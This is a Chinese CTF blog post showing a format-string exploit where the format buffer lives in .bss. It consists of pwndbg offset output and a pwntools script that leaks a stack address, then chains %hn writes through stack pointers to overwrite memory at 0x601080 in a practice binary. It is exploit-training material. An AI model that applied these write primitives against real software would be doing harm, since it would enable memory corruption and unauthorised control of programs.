72217_格式化字符串不在栈上的利用方式

格式化字符串不在栈上的利用方式, 参数在 .bss 段，不在栈上

"""
|0a:0050│  0x7ffe9b362c80 —▸ 0x4005d0 (_start) ◂— xor ebp, ebp
│13:0098│  0x7ffe9b362cc8 —▸ 0x7ffe9b362d38 —▸ 0x7ffe9b362c82 ◂— 0x2d20000000000040 /* '@'
│pwndbg> fmtarg 0x7ffe9b362cc8
│The index of format argument : 25 ("\%24$p")
pwndbg> fmtarg 0x7ffe9b362c80
The index of format argument : 16 ("\%15$p")
pwndbg> fmtarg 0x7ffe9b362d38
The index of format argument : 39 ("\%38$p")
0x7ffe9b362d38 - 0x7ffe9b362c80 = 0xb8
"""
from pwn import *

s = process('demo')
value = 0xDEADBEEF12345678

payload = "%25$p"
# offset 25
# offset 16
# offset 39

# gdb.attach(s, "b *0x4006e5\n\c\n")
# gdb.attach(s, "b *0x04006FE\n\c\n")
s.sendline(payload)
stack = int(s.recv(14), 16)
success(hex(stack))

pie = stack - 0xb8
pie += 2
print('pie ', hex(pie))
payload = "%" + str(pie & 0xffff) + "c%25$hn"
print('payload, ', payload)
s.sendline(payload)

secret1 = 0x601080
secret2 = secret1 // 0x10000
payload = "%" + str(secret2 & 0xffff) + "c%39$hn"
s.sendline(payload)

pie -= 2
payload = "%" + str(pie & 0xffff) + "c%25$hn"
s.sendline(payload)

for i in range(4):
    payload = "%" + str(secret1 & 0xffff) + "c%39$hn"
    s.sendline(payload)
    payload = "%" + str(value & 0xffff) + "c%16$hn"
    s.sendline(payload)
    secret1 += 2
    value //= 0x10000

s.sendline('bye')
s.interactive()

本栏目推荐文章
• 【pwn】cmcc_simplerop --rop链的构造
• 【pwn】hitcontraining_uaf --堆利用之uaf
• 【pwn】inndy_rop --ropchain的利用
• pwn2_sctf_2016
• wanna_pwn2own!
• PWN入门
• 【pwn】[ZJCTF 2019]EasyHeap --fastbin攻击，house of spirit
• pwn知识——ret2text进阶
• Pwn 练习随笔
• 【pwn】[HNCTF 2022 WEEK3]smash --花式栈溢出

CTFer PWNctfer pwn ctfer 专题glance世界ctfer web-robots robots ctfer blogs 笔记ctfer web-unserialize unserialize ctfer blogs 新生include专题ctfer web-easyphp easyphp ctfer blogs can_has_stdio专题 世界ctfer php_rce专题 世界ctfer